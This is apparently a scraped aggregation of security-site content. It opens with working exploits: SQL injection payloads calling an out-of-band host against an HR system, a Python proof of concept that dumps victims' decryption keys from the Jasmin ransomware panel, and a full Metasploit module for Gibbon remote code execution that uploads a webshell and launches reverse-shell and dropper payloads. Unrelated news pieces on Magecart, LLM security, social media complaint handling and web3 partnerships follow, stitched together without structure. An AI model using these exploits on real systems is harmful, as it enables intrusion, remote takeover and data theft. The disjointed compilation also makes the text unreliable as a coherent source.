Human Resource Management System 2024 version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: hrm2024.1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 04/02/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The cityedit parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'was submitted in the cityedit parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system by using thisvulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: cityedit (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(selectload_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+''ELSE 0x28 END)) AND 'GMzs'='GMzs    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT(ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qJHK'='qJHK    Type: time-based blind    Title: MySQL > 5.0.12 AND time-based blind (heavy query)    Payload: cityedit=22'+(selectload_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+''AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR1) AND 'Jtnd'='Jtnd---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/hrm-2024.1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/hrm202410-multiple-sqli.html)## Time spent:01:15:00

Human Resource Management System 2024 1.0 SQL Injection

Jasmin Ransomware version 1.1 suffers from an arbitrary file read vulnerability.

    # Exploit Title: Jasmin Ransomware arbitrary file read# Date: 2024-04-04# Exploit Author: @_chebuya# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware# Version: v1.1# Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-30851# Description: Jasmin Ransomware panel contains multiple SQL injections and authorization issues, allowing a remote unauthenticated attacker to read arbitrary files off the server and bypass the login# Github: https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc/tree/mainimport requestsimport argparseimport osfrom bs4 import BeautifulSoupdef get_file(jasmin_url, filepath):    response = requests.get(        f'{jasmin_url}/download_file.php?file={filepath}',        allow_redirects=False    )    return response.textdef get_keys(jasmin_url):    headers = {        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',    }    data = "username=&password='+or+1%3D1+--+-&service=login"    login_req = requests.post(f'{jasmin_url}/checklogin.php', headers=headers, data=data)    cookies = login_req.cookies    list_req = requests.get(f'{jasmin_url}/dashboard.php', cookies=cookies)    soup = BeautifulSoup(list_req.text, 'html.parser')    rows = soup.find_all('tr')    print(f"Dumping decryption keys from {len(rows)-1} victims")    for row in rows:        data = row.find_all('td')        if len(data) == 0:            continue                username = data[1].get_text()        hostname = data[0].get_text()        filepath = data[7].find('a')['href'].split("=")[1]        print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")parser = argparse.ArgumentParser(description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel")subparser = parser.add_subparsers(dest='subcommand')file_parser = subparser.add_parser("getfile", help="Read a file off the server")file_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")file_parser.add_argument("-f", "--file", default="c:/xampp/apache/logs/access.log", help="The file to read on the target server") # Default is the access log, deanonymize the operators!keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")keys_parser.add_argument("-u", "--url", required=True, help="The jasmin ransomware web panel url (http://target_server)")args = parser.parse_args()if args.subcommand != None:    target_url = args.url.rstrip("/")if args.subcommand == "getkeys":    get_keys(target_url)elif args.subcommand == "getfile":    target_file = args.file.replace("\\", "/").replace("c:", "")    target_path = os.path.join("../../../../../../../../../", target_file)    print(get_file(target_url, target_path))else:    parser.print_help()

Jasmin Ransomware 1.1 Arbitrary File Read

A remote code execution vulnerability in Gibbon online school platform version 26.0.00 and lower allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request to the endpoint /modules/System%20Admin/import_run.php&type=externalAssessment&step=4. As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands, potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Gibbon School Platform Authenticated PHP Deserialization Vulnerability',        'Description' => %q{          A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower          allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a          POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.          As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,          potentially resulting in complete system compromise, data exfiltration, or unauthorized access          to sensitive information.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Ali Maharramli', # SecondX.io Research Team - discovery of the vulnerability          'Fikrat Guliev', # SecondX.io Research Team - discovery of the vulnerability          'Islam Rzayev' # SecondX.io Research Team - discovery of the vulnerability        ],        'References' => [          ['CVE', '2024-24725'],          ['URL', 'https://attackerkb.com/topics/ogKGAB44BP/cve-2024-24725'],          ['PACKETSTORM', '177635'],          ['EDB', '51903']        ],        'DisclosureDate' => '2024-03-18',        'Platform' => ['php', 'unix', 'linux', 'win'],        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => false,        'Targets' => [          [            'PHP',            {              'Platform' => ['php'],              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],              'Linemax' => 16384,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :windows_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Dropper',            {              'Platform' => 'win',              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :windows_dropper,              'Linemax' => 16384,              'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The Gibbon online school platform endpoint URL', '/' ]),      OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),      OptString.new('USERNAME', [true, 'Gibbon username to login, typically an e-mail address']),      OptString.new('PASSWORD', [true, 'Password'])    ])  end  def gibbon_login    # construct multipart login form data    form_data = Rex::MIME::Message.new    form_data.add_part('', nil, nil, 'form-data; name="address"')    form_data.add_part('default', nil, nil, 'form-data; name="method"')    form_data.add_part(datastore['USERNAME'].to_s, nil, nil, 'form-data; name="username"')    form_data.add_part(datastore['PASSWORD'].to_s, nil, nil, 'form-data; name="password"')    form_data.add_part('025', nil, nil, 'form-data; name="gibbonSchoolYearID"')    form_data.add_part('0002', nil, nil, 'form-data; name="gibboni18nID"')    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'login.php?timeout=true'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })  end  def construct_form_data(payload)    # construct multipart form data with payload    payload_len = payload.length    payload_data = "a:2:{i:7;O:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:9:\"\x00*\x00socket\";O:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"\x00*\x00handler\";r:3;s:13:\"\x00*\x00bufferSize\";i:-1;s:9:\"\x00*\x00buffer\";a:1:{i:0;a:2:{i:0;s:#{payload_len}:\"#{payload}\";s:5:\"level\";N;}}s:8:\"\x00*\x00level\";N;s:14:\"\x00*\x00initialized\";b:1;s:14:\"\x00*\x00bufferLimit\";i:-1;s:13:\"\x00*\x00processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}i:7;i:7;}"    form_data = Rex::MIME::Message.new    form_data.add_part('/modules/System Admin/import_run.php', nil, nil, 'form-data; name="address"')    form_data.add_part('sync', nil, nil, 'form-data; name="mode"')    form_data.add_part('N', nil, nil, 'form-data; name="syncField"')    form_data.add_part('', nil, nil, 'form-data; name="syncColumn"')    form_data.add_part(payload_data.to_s, nil, nil, 'form-data; name="columnOrder"')    form_data.add_part('N;', nil, nil, 'form-data; name="columnText"')    form_data.add_part('%2C', nil, nil, 'form-data; name="fieldDelimiter"')    form_data.add_part('%22', nil, nil, 'form-data; name="stringEnclosure"')    form_data.add_part("#{Rex::Text.rand_text_alpha(8..16)}.xlsx", nil, nil, 'form-data; name="filename"')    form_data.add_part('"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"', nil, nil, 'form-data; name="csvData"')    form_data.add_part('1', nil, nil, 'form-data; name="ignoreErrors"')    form_data.add_part('Submit', nil, nil, 'form-data; name="Failed"')    return form_data  end  def upload_webshell(b64_payload)    # randomize file name if option WEBSHELL is not set    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")    # create webshell with base64 encoded PHP payload    # works for both windows and linux targets    php_payload = "echo \"<?php @eval(base64_decode(\'#{b64_payload}\'));?>\" > #{@webshell_name}"    form_data = construct_form_data(php_payload)    # upload webshell    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    res = upload_webshell(payload)    fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200    register_file_for_cleanup(@webshell_name)    # execute webshell    send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, @webshell_name),      'keep_cookies' => true    })  end  def execute_command(cmd, _opts = {})    form_data = construct_form_data(cmd)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })  end  def check    print_status("Checking if #{peer} can be exploited.")    res = send_request_cgi!({      'method' => 'GET',      'ctype' => 'application/x-www-form-urlencoded',      'uri' => normalize_uri(target_uri.path)    })    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200    # check if target is running the Gibbon online school platform    # search for the Gibbon version on the login page    return CheckCode::Safe('No Gibbon school platform found.') unless res.body.include?('Gibbon')    # trying to get the version    version = res.body.match(/Gibbon.*v(\d+\.\d+\.\d+)/)    version_number = version[0].split('v') unless version.nil?    if version_number      if Rex::Version.new(version_number[1]) <= Rex::Version.new('26.0.00')        return CheckCode::Appears("Gibbon v#{version_number[1]}")      else        return CheckCode::Safe("Gibbon v#{version_number[1]}")      end    end    CheckCode::Detected  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    res = gibbon_login    fail_with(Failure::NoAccess, "Login failed with user #{datastore['USERNAME']} and password #{datastore['PASSWORD']}.") unless res && res.code == 302    case target['Type']    when :php      execute_php(payload.encoded)    when :unix_cmd, :windows_cmd      execute_command(payload.encoded)    when :linux_dropper, :windows_dropper      # don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

Gibbon School Platform 26.0.00 Remote Code Execution

The infamous payment-skimmer cybercrime organization is exploiting CVE-2024-20720 in Magento for a novel approach to stealing card data.

Source: Tawan Chaisom via Alamy Stock Photo

Magecart attackers have a new trick: Stashing persistent backdoors within e-commerce websites that are capable of pushing malware automatically.

According to researchers at Sansec, the threat actors are exploiting a critical command injection vulnerability in the Adobe Magento e-commerce platform (CVE-2024-20720, CVSS score of 9.1), which allows arbitrary code execution without user interaction.

The executed code is a "cleverly crafted layout template" in the layout\_update database table, which contains XML shell code that automatically injects malware into compromised sites via the controller for the Magento content management system (CMS).

"Attackers combine the Magento layout parser with the beberlei/assert package (installed by default) to execute system commands," Sansec said in an alert. "Because the layout block is tied to the checkout cart, this command is executed whenever <store>/checkout/cart is requested."

Sansec observed Magecart (a long-running umbrella organization for cybercrime groups that skim payment card data from e-commerce sites) using this technique to inject a Stripe payment skimmer, which captures and exfiltrates payment data to an attacker-controlled site.

Adobe resolved the security bug in February in both Adobe Commerce and Magento, so e-tailers should upgrade their versions to 2.4.6-p4, 2.4.5-p6, or 2.4.4-p7 to be protected from the threat.

**About the Author(s)**

Magecart Attackers Pioneer Persistent E-Commerce Backdoor

Large language models require rethinking how to bake security into the software development process earlier.

Large language models require rethinking how to bake security into the software development process earlier.

Source: Chroma Craft Media Group via Alamy Stock Photo

Question: What do we really know about large language model (LLM) security? And are we willingly opening the front door to chaos by using LLMs in business?

Rob Gurzeev, CEO, CyCognito: Picture it: Your engineering team is harnessing the immense capabilities of LLMs to "write code" and rapidly develop an application. It's a game-changer for your businesses; development speeds are now orders of magnitude faster. You've shaved 30% off time-to-market. It's win-win — for your org, your stakeholders, your end users.

Six months later, your application is reported to leak customer data; it has been jailbroken and its code manipulated. You're now facing SEC violations and the threat of customers walking away.

Efficiency gains are enticing, but the risks cannot be ignored. While we have well-established standards for security in traditional software development, LLMs are black boxes that require rethinking how we bake in security.

**New Kinds of Security Risks for LLMs**

LLMs are rife with unknown risks and prone to attacks previously unseen in traditional software development.

*   Prompt injection attacks involve manipulating the model to generate unintended or harmful responses. Here, the attacker strategically formulates prompts to deceive the LLM, potentially bypassing security measures or ethical constraints put in place to ensure responsible use of the artificial intelligence (AI). As a result, the LLM's responses can deviate significantly from the intended or expected behavior, posing serious risks to privacy, security, and the reliability of AI-driven applications.
    
*   Insecure output handling arises when the output generated by an LLM or similar AI system is accepted and incorporated into a software application or Web service without undergoing adequate scrutiny or validation. This can expose back-end systems to vulnerabilities, such as cross-site scripting (XSS), cross-site request forgery (CSRF), server-side request forgery (SSRF), privilege escalation, and remote code execution (RCE).
    
*   Training data poisoning occurs when the data used to train an LLM is deliberately manipulated or contaminated with malicious or biased information. The process of training data poisoning typically involves the injection of deceptive, misleading, or harmful data points into the training dataset. These manipulated data instances are strategically chosen to exploit vulnerabilities in the model's learning algorithms or to instill biases that may lead to undesired outcomes in the model's predictions and responses.
    

**A Blueprint for Protection and Control of LLM Applications**

While some of this is new territory, there are best practices you can implement to limit exposure.

*   Input sanitization involves, as the name suggestion, the sanitization of inputs to prevent unauthorized actions and data requests initiated by malicious prompts. The first step is input validation to ensure input adheres to expected formats and data types. The next is input sanitization, where potentially harmful characters or code are removed or encoded to thwart attacks. Other tactics include whitelists of approved content, blacklists of forbidden content, parameterized queries for database interactions, content security policies, regular expressions, logging, and continuous monitoring, as well as security updates and testing.
    
*   Output scrutiny is the rigorous handling and evaluation of the output generated by the LLM to mitigate vulnerabilities, like XSS, CSRF, and RCE. The process begins by validating and filtering the LLM's responses before accepting them for presentation or further processing. It incorporates techniques such as content validation, output encoding, and output escaping, all of which aim to identify and neutralize potential security risks in the generated content.
    
*   Safeguarding training data is essential to prevent training data poisoning. This involves enforcing strict access controls, employing encryption for data protection, maintaining data backups and version control, implementing data validation and anonymization, establishing comprehensive logging and monitoring, conducting regular audits, and providing employee training on data security. It's also important to verify the reliability of data sources and ensure secure storage and transmission practices.
    
*   Enforcing strict sandboxing policies and access controls can also help mitigate the risk of SSRF exploits in LLM operations. Techniques that can be applied here include sandbox isolation, access controls, whitelisting and/or blacklisting, request validation, network segmentation, content-type validation, and content inspection. Regular updates, comprehensive logging, and employee training are also key.
    
*   Continuous monitoring and content filtering can be integrated into the LLM's processing pipeline to detect and prevent harmful or inappropriate content, using keyword-based filtering, contextual analysis, machine-learning models, and customizable filters. Ethical guidelines and human moderation play key roles in maintaining responsible content generation, while continuous real-time monitoring, user feedback loops, and transparency ensure that any deviations from desired behavior are promptly addressed.
    

**About the Author(s)**

Dark Reading

The Edge is Dark Reading's home for features, threat data and in-depth perspectives on cybersecurity.

You May Also Like

How Do We Integrate LLMs Security Into Application Development?

By Owais Sultan
If used correctly, social media can not only provide businesses with a fantastic (generally free) chance to market…
This is a post from HackRead.com Read the original post: How your business should deal with negative feedback on social media

If used correctly, social media can not only provide businesses with a fantastic (generally free) chance to market their product or services but also, just as importantly, allow them to engage with customers. However, as anyone with any experience on social media will testify, not all the interactions to be had are positive ones.

In this article, limited company formation specialists 1st Formations (who you will find on all major social media platforms) provide a roadmap for how your business should handle any negative feedback that you receive on social media. Let’s get started.

You can’t deal with negative feedback or comments about your business if you don’t see what’s being said. You need to be diligent in ensuring that you catch everything.

Whilst the platforms’ in-built alerts are relatively reliable, it’s still easy to miss important comments, or simply lose track of what’s being said. To ensure that you see everything, use your social media management system (if you’re not yet using one, you really should be) to track all the words and phrases connected to your brand, even if they’re not officially used by you.

This way, if everything has been set up correctly, you will be notified immediately whenever your name is mentioned. This will allow you to keep on top of any discussions that are happening.

Furthermore, you should also set up Google Alerts to cover the feedback that is being shared away from social media on forums and other web pages.

****Deal with the feedback quickly****

Your time is of course precious, and social media activity won’t always be at the top of your to-do list. However, when negative feedback does come through, whether this is a tweet or a comment on Instagram or YouTube, you must respond as soon as you can (within business hours) to prevent the issue from escalating.

If there is a specific issue, rather than a piece of fleeting feedback that you can address there and then, this does not mean that you need to fix the problem immediately. Request all the information that you need (if it’s an existing customer, we’re talking name, order reference, and contact information), and clearly state that you’re looking into the matter and will get back to them shortly.

Providing an exact timeframe in which you will be back in touch is a good idea, but make sure that the deadline you set yourself is realistic, as the customer chasing you down for an update could cause further damage.

Then, when you do get a chance, work with your team and the individuals involved to reach a satisfactory resolution. Hopefully, this isn’t a drawn-out process, but when it is a complicated matter, make sure you provide the individual with regular updates, being sure to thank them for their understanding.

****Take it offline****

The ideal scenario is to take the issue away from public view as soon as possible. At the same time as requesting the information you need to investigate any issue, explain to the individual that you will be in contact with them through email or if convenient, telephone.

This is a genuinely more efficient approach to resolving any issues, rather than the stagnated back and forth that social media provides, and makes sure that the situation isn’t played out in a public forum where reputational damage can be made.

This will not always be convenient for the person you are engaging with. They will generally understand that you will want to tackle the situation in private. When this occurs, simply explain how corresponding away from the social media platform will help resolve the issue quicker. This won’t always work but you must try.

****Remain professional at all times****

Ryanair is perhaps the well-known purveyor of the snarky social media response to less-than-happy customers. This approach works well for them because they’re a household name and it’s very much ‘on-brand’. However, this stance is probably not appropriate for you and your business.

> you may only look out of one https://t.co/goZsZ9zkqb
> 
> — Ryanair (@Ryanair) April 2, 2024

When less than positive comments are made, you must remain professional. Under no circumstances should you partake in an online argument with anyone – even if what they say is wholly incorrect and paints your operation poorly.

Take on an apologetic tone, even if you are in the right. Thank them for the feedback, ask what a satisfactory resolution for them would be, and then do what you can, within your protocols (don’t deviate from these just because it’s on social media) to fix any issues that have arisen.

State your case, if a problem has occurred because the customer has misunderstood something or has not provided the correct information required for their order to be processed, explain this – but again, in a professional manner.

****Know when enough is enough****

When negative feedback oversteps the mark and turns into harassment, you should take necessary action. Certain behaviours do not become acceptable just because it’s aimed at a business account rather than a personal account.

If you are being targeted, you should publicly state your business’s policies regarding harassment. If the abuse continues, you should ignore the comments (admittedly this is easier said than done) and then consider muting or blocking the account in question.

If it continues, you should report the user to the social platform, and if the abuse is extreme, also to the police.

****Try to stay calm****

Anyone who has managed social media activity for business purposes will confirm just how easy it is to take negative feedback personally. Regardless of who is right and who is wrong, it is an upsetting experience. This feeling is magnified if the business that is being criticised is your own, as it does feel personal.

This is completely understandable. Nonetheless, this should not seep into how you deal with the feedback. If you are emotionally affected by what is being said, take the necessary mindful steps to calm and relax yourself, but do not allow this to cloud how the issue is dealt with.

As we stressed above, you must remain polite and professional. If you feel that you are unable to do this, move away from the situation for some time or see if there is someone else on your team who can work to resolve the problem accordingly.

****Listen to the feedback****

No business is perfect. Rather than baulk at the idea of negative feedback coming your way, always try to see these as an opportunity to fix issues and ultimately improve your business.

Once a specific issue has been resolved, do what you can to make sure that it doesn’t happen again. In customer-facing roles, it can be easy to lose empathy for the customer, and simply assume every problem is because of a misunderstanding or basic error on their part. It’s their problem, not yours. This is a big mistake.

Your business must have a joined-up approach. If you have a large team, when situations do occur, ensure that these are shared with all the appropriate people so that permanent fixes can be reached.

****Remember, it’s a branding exercise****

Every interaction you have online is a chance to demonstrate to customers and potential customers just how great your brand is, and how much you appreciate your customers.

When a piece of customer feedback has led to an update in how your service is delivered, shout about this. Publicly thank the customer in question, send them a gift, and ask other customers for their feedback and improvement suggestions.

One of the major benefits of using social media for business is that it allows you to project your brand’s personality. This is done through the tone of voice that you use, the content you share, and more so than anything – the interactions that you have with people.

Whilst negative feedback might not be at the top of your list when it comes to the type of engagement you have, it does provide you with the perfect opportunity to change someone’s impression of you. When handled correctly, even the most scathing reviews can be used to your business’s advantage.

****So, there you have it** **

That’s how your business should deal with negative feedback on social media.

Whilst you’ll never be able to stop these comments coming in (without ceasing all social media activity, which is not advisable for a small business), follow the advice covered in this article to ensure feedback is dealt with in a way that protects your business’s reputation and even enhances it. Thanks for reading.

How your business should deal with negative feedback on social media

By Uzair Amir
The partnership will bring millions of players into the Immutable web3 ecosystem while providing GAM3S.GG with the leading web3 gaming platform on the market.
This is a post from HackRead.com Read the original post: GAM3S.GG and Immutable Announce Partnership for Web3 Gaming Expansion

GAM3S.GG, a web3 gaming onboarding and news platform that aims to bring over 100 million players to web3, and Immutable, the leading web3 gaming platform, today announced a strategic partnership that will bring key Immutable functionality to GAM3S.GG users and introduce millions of players to the Immutable ecosystem via GAM3S.GG’s growing community. 

Notably, the partnership will incorporate multiple GAM3S.GG and Immutable zkEVM platform features, including the integration of Immutable Passport and Immutable Checkout, which will provide a streamlined onboarding and purchasing experience.

Additionally, GAM3S.GG will fund exclusive rewards and questing services to games that are building on Immutable zkEVM, while the integration of the $G3 token on Immutable zkEVM will provide even more choice and utility for gamers and games. 

“It’s been clear to our team since we first started working with GAM3S.GG that we share the same goal – to spearhead the onboarding of millions of gamers into a premiere web3 ecosystem,” said Robbie Ferguson, CEO of Immutable. “We’ve worked closely with them on some of our most popular titles, and now will work together with their team to create the best shared web3 gaming ecosystem in the industry.”

Collaborative efforts between the two companies are already underway. Earlier this year, Immutable and GAM3S.GG launched exclusive quests, community tournaments and in-game content for _Blast Royale_ and _MetalCore_, helping drive player growth and anticipation for both titles. 

“It’s clear that web3 gaming is poised to explode, and we plan to drive this explosion alongside Immutable as a key partner,” said Omar Ghanem, CEO of GAM3S.GG. “We’re incredibly excited to combine our rapidly growing web3 gaming community with the full power of the Immutable ecosystem to bring millions of gamers into the fold and drive the next evolution of the entire games industry.”

Immutable and GAM3S.GG plans to announce future integrations and exclusive content in the coming months, with key support for the launch of several industry-firsts for web3 gaming.

****About GAM3S.GG****

GAM3S.GG is a web3 gaming super app with over 500,000+ registered users that curates and creates content to spotlight the top games and showcase reviews, guides, news, quests, annual awards, and more. Its vision is to become the one-stop-shop for web3 gaming to help onboard millions of gamers, allowing them to engage with blockchain-powered games in unprecedented ways and becoming the ultimate bookmark on every gamer’s device.

GAM3S.GG has built the #1 web3 gaming discovery platform over the past 2 years and is backed by prominent investors such as Mechanism Capital, Polygon Ventures, Merit Circle, Hyperithm, LD Capital, ROK Capital, ArkStream Capital, Double Peak, WWVentures and more.

****About Immutable****

Immutable is a global leader in gaming on a mission to bring digital ownership to every player by making it safe and easy to build great games with blockchain technology. Co-founded by James Ferguson, Robbie Ferguson and Alex Connolly in 2018, Immutable is headquartered in Sydney with a 250+ team, and backed by top transformational tech investors like Temasek, Tencent, Coinbase, BITKRAFT Ventures, King River Capital, Galaxy Interactive and more.  

The Immutable gaming platform makes it easy for game studios and independent developers to safely and confidently build and launch successful games on Ethereum. The product suite includes pre-built solutions, optimised for usability, that help developers get to market faster without sacrificing security or player experience. Builders get personalised web3 guidance, live support for their communities, and access to the largest ecosystem in gaming.

Immutable was the first gaming platform to deliver a zero-knowledge (zk) scaling solution to the Ethereum community and provides developers with multiple zk-based scaling options, including Immutable X, a rollup based on StarkWare technology, and Immutable zkEVM, powered by Polygon.

Immutable Games is a global leader in web3 game development and publishing, backed by a world-class team who have a proven track record of bringing games to millions of players. The studio pioneered the world’s first blockbuster NFT trading-card game Gods Unchained and is currently building the highly anticipated mobile RPG Guild of Guardians.

Alongside its high-quality titles, Immutable Games partners with third-party game developers to provide them with best-in-class strategy and execution expertise to ensure the success of every web3 game deployed within the Immutable ecosystem.

1.  Wilder World Launches The First ‘GTA of Web3’ Game
2.  What is Blockchain Gaming and its Play-to-Earn Model?
3.  Exploring Data Privacy and Security in B2B Gaming Data
4.  Gomble Games Secures $10M Funding for Web3 Gaming
5.  The Rise of Blockchain Gaming and Secure Marketplaces

GAM3S.GG and Immutable Announce Partnership for Web3 Gaming Expansion

By Owais Sultan
Institutions, dApps and users on Flare will now benefit from Hypernative’s industry-leading ecosystem-wide protection suite. 
This is a post from HackRead.com Read the original post: Web3 Security Specialist Hypernative To Provide Proactive Protection To The Flare Ecosystem

Flare is pleased to announce the onboarding of Hypernative, an industry leader in proactive institutional grade Web3 security. The Hypernative platform will protect Flare ecosystem participants against zero-day cyberattacks, alerting the network ahead of emerging risks to digital assets, protocol/dApp vulnerabilities, and evolving threats to web3 users. 

Web3 attacks are becoming more sophisticated and are originating from a broader base of exploit vectors. As the industry continues to grow, it becomes a larger target for bad actors across the globe. By teaming up with an established leader in web3 security, Flare is increasing safety and protection for all users, dApps and institutions in the Flare ecosystem.

The Hypernative platform has developed cutting-edge technology designed to stay several steps ahead of web3 exploits, continuously looking for weaknesses across assets, protocols, and applications. As of today, the platform has detected over 270 exploits that could have potentially cost $14 Billion in damages. A leader in the field, Hypernative serves some of the largest web3 ecosystems in the industry, totalling $37 Billion in total value monitored.

The Hypernative architecture is unique in the web3 space. It can provide “always-on” monitoring of various activities including on-chain, governance, financial, and security-based. It was designed to preemptively detect many risks and attacks before the impact is felt, allowing clients to take action and mitigate any losses. 

To date, over 764K risks have been detected across 1443 protocols that are constantly monitored. Because of the high volume, Hypernative focuses on critical insights, alerts, and recommended actions to avoid false positives (but without compromising via false negatives).

The system is easily integrated across all web3 platforms, complete with API data, alerts, and customization options. This type of security is especially important for those web3 institution groups with heavy financial activity, such as DeFi. These types of platforms are targeted due to the financial opportunities and therefore will benefit from the increased and proactive protection provided by Hypernative. 

Hugo Philion, Co-founder of Flare & CEO of Flare Labs, commented, “Flare has been architected with enshrined oracles to support high transaction value use cases, including DeFi and AI. Hypernative’s monitoring on Flare will help provide applications and their users with an additional layer of defence against potential exploits. We aim to provide the highest level of security possible, so institutions, builders and community members have the confidence to engage with decentralized applications on the network.”

Flare is an EVM smart contract platform optimized for decentralized data acquisition. With a set of integrated oracles secured at the network layer, Flare offers developers secure, low-cost access to a broad range of price and state data for their dApps. As an EVM-based platform, any Solidity-coded applications can be launched and run on the network.

“There is a dawning realization that web3 needs a new security standard that goes beyond audits and bounties,” said Gal Sagie, co-founder and CEO of Hypernative. “It’s encouraging to see leading protocols like Flare take a global approach to security and implement active strategies that protect their entire ecosystem.”

As web3 smart contracts get more and more complex, the intelligence needed to protect them must continuously improve as well. Because of Hypernative’s strong record of protecting some of blockchain’s most advanced platforms, the tools it has developed are not only industrial strength, they are battle-hardened. Hypernative will be instrumental in protecting the over 290 projects built on Flare with real-time, proactive warnings designed to prevent and minimize the potential damage created from even sophisticated attacks.

